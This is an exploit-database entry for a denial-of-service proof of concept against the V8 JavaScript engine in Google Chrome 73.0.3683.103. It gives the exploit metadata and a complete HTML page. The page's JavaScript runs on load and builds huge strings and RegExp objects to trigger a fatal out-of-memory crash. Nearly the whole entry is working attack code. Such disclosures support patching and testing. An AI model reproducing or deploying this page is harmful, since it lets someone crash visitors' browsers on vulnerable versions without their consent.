Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)
2019-04-22 18:05:07<!--
# Exploit Title: Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-04-20
# Exploit Author: Bogdan Kurinnoy ([email protected])
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 73.0.3683.103
# Tested on: Windows x64
# CVE : N/A
# Description:
# Fatal javascript OOM in invalid table size
# https://bugs.chromium.org/p/chromium/issues/detail?id=918301
-->
<html>
<head>
<script>
var arr1 = [0,1];
function ObjCreate(make) {
this.make = make;
}
var obj1 = new ObjCreate();
function main() {
arr1.reduce(f3);
Object.getOwnPropertyDescriptors(Array(99).join(obj1.make));
}
function f3() {
obj1["make"] = RegExp(Array(60000).join("CCC"));
}
</script>
</head>
<body onload=main()></body>
</html>
Fixes
No fixesIn order to submit a new fix you need to be registered.